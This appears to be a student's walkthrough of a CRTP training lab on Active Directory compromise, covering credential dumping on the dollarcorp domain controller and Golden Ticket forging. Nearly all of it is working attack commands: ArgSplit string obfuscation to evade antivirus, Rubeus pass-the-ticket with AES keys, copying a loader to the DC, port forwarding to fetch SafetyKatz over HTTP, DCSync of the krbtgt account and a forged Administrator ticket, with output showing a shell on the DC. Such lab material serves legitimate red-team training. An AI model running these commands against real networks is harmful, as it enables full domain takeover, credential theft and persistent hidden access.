CRTP Lab 8

Task 1

Extract secrets from the domain controller of dollarcorp.

Since we have DA privs, we can extract all hashes on DC.

Let's start a process as DA from elevated cmd of student.

# Run ArgSplit for asktgt
C:\Users\student372>cd \AD\Tools

C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"
C:\AD\Tools>set "z=t"
C:\AD\Tools>set "y=g"
C:\AD\Tools>set "x=t"
C:\AD\Tools>set "w=k"
C:\AD\Tools>set "v=s"
C:\AD\Tools>set "u=a"
C:\AD\Tools>set "Pwn=%u%%v%%w%%x%%y%%z%"

# Get DA shell as svcadmin

C:\AD\Tools>C:\AD\Tools\Rubeus.exe %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

To dump hashes:

  • Copy Loader from student to dcorp-dc

  • Spawn cmd on dcorp-dc

  • Set up portforward to run SafetyKatz

  • Finally, run SafetyKatz

Note: We only get NTLM hashes using "lsadump::lsa /patch". 

# Copy Loader.exe to DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

# Spawn interactive shell
winrs -r:dcorp-dc cmd

# Set up port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72

# ArgSplit "lsadump::lsa"
# Dump hashes
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit"

Let's use DCSync to dump both, NTLM and AES hashes.

# ArgSplit to encode lsadump::dcsync
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"

Task 2

Using the secrets of krbtgt account, create a Golden ticket.

Using the KRBTGT hashes, we can now perform Golden Ticket attack to maintain persistence.

# ArgSplit "golden"
# Forge TGT using Rubeus or SafetyKatz
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /printcmd

OR

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

It prints the command to recreate the ticket.

Task 3

Use the Golden ticket to (once again) get domain admin privileges from a machine.

# Use the printed command to import ticket.
C:\AD\Tools\Loader.exe golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:33:55 AM" /minpassage:1 /logoncount:3335 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD

Finally we can get a shell as dcorp-dc

C:\Users\student372>winrs -r:dcorp-dc cmd

C:\Users\Administrator>set username
set username
USERNAME=Administrator
C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
PreviousGolden TicketNextSilver Ticket

Last updated